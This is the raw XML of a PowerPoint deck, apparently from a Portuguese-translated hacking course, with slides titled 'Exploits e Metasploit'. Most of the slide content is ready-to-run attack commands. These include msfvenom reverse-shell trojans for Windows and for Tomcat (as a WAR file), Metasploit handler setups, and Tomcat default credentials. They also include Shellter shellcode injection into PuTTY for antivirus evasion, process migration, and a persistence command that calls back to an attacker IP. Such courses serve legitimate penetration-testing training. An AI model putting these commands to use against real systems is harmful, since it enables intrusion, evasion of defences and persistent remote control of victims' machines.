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sldIdLst>
    <p:sldId id="263" r:id="rId6"/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D045D-071D-4E25-8E34-1121CF8205BD}" v="3" dt="2020-11-16T07:02:39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li Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{C43D045D-071D-4E25-8E34-1121CF8205BD}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{C43D045D-071D-4E25-8E34-1121CF8205BD}" dt="2020-11-16T07:02:39.567" v="1"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="addSp delSp modSp">
        <pc:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{C43D045D-071D-4E25-8E34-1121CF8205BD}" dt="2020-11-16T07:02:39.567" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1266942487" sldId="256"/>
        </pc:sldMkLst>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{C43D045D-071D-4E25-8E34-1121CF8205BD}" dt="2020-11-16T07:02:39.567" v="1"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1266942487" sldId="256"/>
            <ac:picMk id="3" creationId="{CC928954-C162-4924-B715-7235D4EB166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51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52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103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719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ko-KR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333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2404412" y="4512734"/>
            <a:ext cx="6858000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Curso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Hacking para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Infraestruturas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Tradu</a:t>
            </a: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ção: Luli Rosenberg &amp; Helton Wernik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31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72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4736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217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457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9832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06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9160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601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8050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4149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6017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60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ko-KR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קורס פייתון בהייטק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 Zaikin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23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 sz="5333" b="1" u="sng" baseline="0">
                <a:latin typeface="Ariel"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" u="none" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r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367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altLang="ko-KR" sz="373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</p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="168631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000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99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694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27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81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318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06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hyperlink" Target="http://www.free-powerpoint-templates-design.com/free-powerpoint-templates-design" TargetMode="Externa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74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11/16/2020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hlinkClick r:id="rId15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</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="pt-BR" altLang="ko-KR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</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="pt-BR" sz="1333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hay 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637" y="5405415"/>
            <a:ext cx="1854364" cy="110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37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561923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880" y="1"/>
            <a:ext cx="2219120" cy="131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1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Exploits </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Metasploit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694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6422" y="232628"/>
            <a:ext cx="9144000" cy="799412"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>Exploits </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>Metasploit – Msfvenom Trojan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6423" y="4111729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msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -p windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> LHOST=[local ip] LPORT=[local port] -e x86/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shikata_ga_nai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -f exe -o Trojan.exe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423" y="5375153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Python3 -m </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>http.server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>80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0332" y="2034311"/>
            <a:ext cx="11059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exploit/multi/handler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payload windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>reverse_tcp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lport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 4444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lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 192.168.X.X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exploit -j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216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/>
              <a:t>Listener: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2" y="3820185"/>
            <a:ext cx="2163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/>
              <a:t>Payload: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2" y="5049604"/>
            <a:ext cx="3852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 err="1" smtClean="0"/>
              <a:t>servidor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> web com Python: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97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2764" y="380245"/>
            <a:ext cx="9144000" cy="630961"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>Exploits </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>Metasploit – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0"/>
              <a:t>Meterpreter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64821" y="2075761"/>
            <a:ext cx="110598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getuid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getprives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arp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netstat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ipconfig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sysinfo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ps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idletime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screenshare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shell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86" y="1614096"/>
            <a:ext cx="1311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Funções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5035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7909" y="267982"/>
            <a:ext cx="9144000" cy="71912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Exploits e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>Metasploit – Web Enumeration - Tomcat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3941358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msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -p java/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jsp_shell_reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> LHOST=[local ip] LPORT=[local port] -f war &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shell.war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3655841"/>
            <a:ext cx="2163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/>
              <a:t>Payload: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942" y="2101123"/>
            <a:ext cx="110598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exploit/multi/handler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payload java/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jsp_shell_reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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lport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 4444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lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 192.168.X.X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exploit -j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3" y="1731791"/>
            <a:ext cx="216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/>
              <a:t>Listener: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423" y="4757412"/>
            <a:ext cx="2068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Credenciais</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>padrão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6423" y="5121889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Username: tomcat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Password: tomcat</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2920635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871" y="379734"/>
            <a:ext cx="9480129" cy="860215"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Exploits </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Metasploit – Advanced Trojan - Shellcode Injection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3163999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dpkg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> --add-architecture i386 &amp;&amp; apt-get update &amp;&amp; apt-get install wine32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423" y="2794667"/>
            <a:ext cx="2235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Instalação</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> de Wine32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6423" y="2017308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apt-get install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellter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6423" y="1731791"/>
            <a:ext cx="2230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Instalação</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Shellter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6423" y="4142944"/>
            <a:ext cx="2319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Putty 32bit download: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6423" y="4477682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https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="388233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1271" y="420982"/>
            <a:ext cx="9913545" cy="632255"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>Exploits </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>Metasploit – Auto Migration – Process jumping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6958" y="3440224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show advanced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autorunscript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /root/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CommandsOnExecute.rc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3070892"/>
            <a:ext cx="2783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Mostrar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>opções</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>avançadas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26423" y="2017308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touch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CommandsOnExecute.rc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run post/windows/manage/migrate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3" y="1731791"/>
            <a:ext cx="4967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um </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>arquivo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>comandos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> (command file):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608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9267" y="332324"/>
            <a:ext cx="9144000" cy="837806"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>Exploits And Metasploit – Persistence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3" y="2017308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run persistence -U -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 5 -p 4443 -r 192.168.x.x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3" y="1731791"/>
            <a:ext cx="2178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Criando</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Persistência</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/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26761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3BE3544194A9711D8E727977D0B" ma:contentTypeVersion="9" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="a0461d9f18494fcf3d666a9b55801854">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="0de1bb88-64f6-4f17-8933-73fd235044ff" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="7ff04b9cd91440e018d95297d8933c08" ns2:_="">
    <xsd:import namespace="0de1bb88-64f6-4f17-8933-73fd23504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1bb88-64f6-4f17-8933-73fd23504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57D2DC-A20D-4A22-A60D-BDF60674EC0A}"/>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{BB419632-9094-49CB-BB47-CF4E513AB3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1FF09E-CCBA-419D-AC7D-A4805F88CC5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0de1bb88-64f6-4f17-8933-73fd235044f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5930</TotalTime>
  <Words>234</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>מסך רחב</PresentationFormat>
  <Paragraphs>53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8</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="16" baseType="lpstr">
      <vt:lpstr>맑은 고딕</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Ariel</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>1_Office Theme</vt:lpstr>
      <vt:lpstr>2_Office Theme</vt:lpstr>
      <vt:lpstr>מצגת של PowerPoint‏</vt:lpstr>
      <vt:lpstr>Exploits e Metasploit</vt:lpstr>
      <vt:lpstr>Exploits e Metasploit – Msfvenom Trojan</vt:lpstr>
      <vt:lpstr>Exploits e Metasploit – Meterpreter</vt:lpstr>
      <vt:lpstr>Exploits e Metasploit – Web Enumeration - Tomcat</vt:lpstr>
      <vt:lpstr>Exploits e Metasploit – Advanced Trojan - Shellcode Injection</vt:lpstr>
      <vt:lpstr>Exploits e Metasploit – Auto Migration – Process jumping</vt:lpstr>
      <vt:lpstr>Exploits And Metasploit – Persistence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Exploits And Metasploit</dc:title>
  <dc:creator>shai</dc:creator>
  <cp:lastModifiedBy>user</cp:lastModifiedBy>
  <cp:revision>14</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-11-26T08:36:16Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-16T07:11:56Z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0x010100D56E03BE3544194A9711D8E727977D0B</vt:lpwstr>
  </property>
</Properties>
</file>